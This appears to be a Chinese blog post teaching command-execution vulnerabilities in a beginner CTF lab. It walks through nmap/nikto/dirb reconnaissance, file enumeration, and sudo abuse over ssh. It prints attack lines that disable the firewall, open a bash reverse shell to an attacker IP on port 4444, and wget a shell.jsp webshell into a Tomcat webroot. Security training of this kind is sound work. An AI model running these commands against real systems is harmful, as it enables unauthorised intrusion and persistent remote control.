6-8CTF夺旗入门教程--命令执行

最新推荐文章于 2024-08-04 19:28:45 发布
最新推荐文章于 2024-08-04 19:28:45 发布
阅读量686 收藏 4
点赞数
分类专栏: CTF学习 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46622606/article/details/105903649
版权
1.命令执行漏洞介绍

当应用需要调用一些外部程序去处理内容时,会用到一些执行系统命令的函数。
如php中的system、exec、shell_exec等
当用户可以控制命令执行函数中的参数时,将可以注入 恶意系统命令到正常命令中,造成命令执行攻击
调用这些函数执行系统命令时,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有过滤用户输入的情况下,就会造成命令执行漏洞

2. 信息探测
#扫描主机服务信息以及服务版本
nmap -sV 192.168.2.111
#快速扫描主机全部信息
nmap -T4 -A -v 192.168.2.111
#探测敏感信息
nikto -host http://192.168.2.111:8080
dirb http://192.168.2.111:8080
3.深入挖掘

分析nmap、nikto扫描结果,分析挖掘可以利用的信息
查看http敏感页面
在这里插入图片描述

4.漏洞利用
#查看临时缓冲目录
ls -alh /tmp/
#查看home目录,挖掘用户信息
ls -alh /home/
#查看具体用户的目录
ls -alh /home/用户名/
#查看系统信息
uname -a

在这里插入图片描述

使用ssh命令执行root权限命令

使用ssh用户名@localhost通过登录服务器不需身份验证
#查看bill用户sudu命令权限
ssh bill@localhost sudo -l
#关闭防火墙
ssh bill@localhost sudo ufw disable
5.反弹shell
#攻击机启动监听netcat
nc -nlvp 4444
#靶场机器反弹shell
ssh bill@localhost sudo bash -i >& /dev/tcp/攻击机IP/4444 0>&1

#渗透测试技巧
#开启python简易服务器
python -m SimpleHTTPServer
#利用命令执行下载木马
ssh bill@localhost sudo wget "http://ip:port/shell.jsp" -O /var/lib/tomcat8/webapps/ROOT/shell.jsp

在这里插入图片描述

The Riddler.
关注
专栏目录
CTF-入门练习题
10-30
这个“CTF-入门练习题”很可能包含了一系列这样的挑战,旨在帮助初学者提升在网络安全领域的技能。 【网络攻防】 网络攻防是CTF中的核心部分,涉及攻击者与防御者的对抗。攻击者可能试图寻找系统漏洞,进行SQL注入...
6-2CTF夺旗入门教程--SQL注入POST参数-注入HTTP报文
高冷的宅先生
04-06 717
1.信息探测 #扫描主机开放的全部端口 nmap -T4 -p- 192.168.2.117 #扫描靶场全部信息 nmap -T4 -A -v 192.168.2.117 #探测敏感信息 nikto -host http:// dirb http:// #漏洞扫描 owasp 2.漏洞利用 登录界面 #burpsuite抓包,需要把浏览器设置代理 #在登录界面尝试登录,抓取请求数据包,保存为r...
CTFCTF(夺旗赛)介绍
WenZhongxiang
10-06 4590
CTF攻防模式(Attack-Defense)是CTF比赛的一种模式,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分,修补自身服务漏洞进行防御来避免丢分。需要具备安全编程的能力,能够编写安全的代码等等。CTF比赛的知识范围大致分为:Web安全、PWN(二进制安全)、逆向工程、Misc(杂项)、Crypto(密码学安全)、网络安全。国外:ctftime.org 是对一个在国际上比较重要的赛事的做一些记录,而且会还会给出赛事的一些权重,以及对这种CTF 知名战队的一些排名。
网络安全CTF夺旗赛入门到入狱-入门介绍篇
最新发布
shandongjiushen的博客
08-04 819
CTF介绍&赛制&题型CTF入门思路CTF工具环境安装CTF工具安装介绍一、什么是CTFCTF全称Capture The Flag,直译为“夺旗赛”,起源于1996年举办的DEF CON全球黑客大会,最早是交流安全技术的重要途径。随着时间的推移,CTF 竞赛逐渐演变成为信息安全技术竞赛的一种形式,发展成为全球范围网络安全圈 的流行比赛,但其比赛形式与内容依然拥有浓厚的黑客精神和黑客文化。
ctf夺旗赛
m0_63017769的博客
11-12 6101
好久以前做过的ctf
i春秋网络内生试验场CTF答题夺旗赛(第三季)WP
李熠专用博客_白帽子一枚,人称低危终结者
11-30 2527
0x01 weak 依次点击管理平台->跳转到测试页,可看到测试页代码,可知是一道MD5弱类型的题,只需要找到MD5加密出来为0e,并且用户名和密码不相等且不为数字的即可,笔者已找到两个符合条件的明文,分别是:QNKCDZO和aabg7XSs,回到管理页,用户名和密码分别输入可得flag。 0x02 Electrical System 逆向分析程序可知,这是一个栈溢出的题,编写exp如下:...
CTF-命令执行
Luodehahajiang的博客
07-03 2074
ctf 命令执行 命令执行函数 命令执行绕过方法
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
提示参赛者需要获取服务器的命令执行权限,可能涉及命令注入、PHP代码注入等技术,以实现远程控制。 3. **bugku-ctf 第三题:多次** 可能涉及到时间基的漏洞,如时间盲注,需要参赛者多次尝试以确定数据库查询的...
pentest-lab:OpenStack上的Pentest实验室,具有Heat,Chef设置和Docker
02-01
它部署了一个环境,其中包含一些可用于协作执行渗透测试任务的服务。 它还为目标网络提供了易于使用的脆弱计算机。 入门 工具类 贡献 在Github上分叉存储库 创建一个命名功能分支(如add-component-x ) 写你的...
CTF比赛网络安全竞赛渗透测试入门资料.rar
05-22
预防措施包括限制命令执行权限,使用安全的API进行系统调用,并对用户输入进行严格验证。 5. **Web安全基础**:了解HTTP协议、服务器配置、认证机制和会话管理是理解Web安全的基础。熟悉这些概念可以帮助识别和修复...
解密开展夺旗CTF)竞赛前需要了解的十大问题
yy1715713348的博客
07-03 2300
解密开展夺旗CTF)竞赛前需要了解的十大问题
CTFCTF(夺旗赛)介绍_ctf比赛(1),一起看看这些大厂面试真题查漏补缺吧
2401_84164527的博客
04-09 1547
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
网安学习-CTF夺旗
weixin_44770698的博客
08-26 2258
网安学习-CTF(Python反序列化+JWT)
p84 CTF夺旗-PHP弱类型&异或取反&序列化&RCE
weixin_43263566的博客
03-26 1973
p84 CTF夺旗-PHP弱类型&异或取反&序列化&RCE
CTF 夺旗 Capture the Flag(探测可存储的flag)
qq_43613772的博客
06-08 5506
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。 信息探测: 扫描主机开放的端口号: nmap -p- -T4 靶场IP地址 和前几次一样的快速...
ctfshow web入门命令执行
09-05
CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值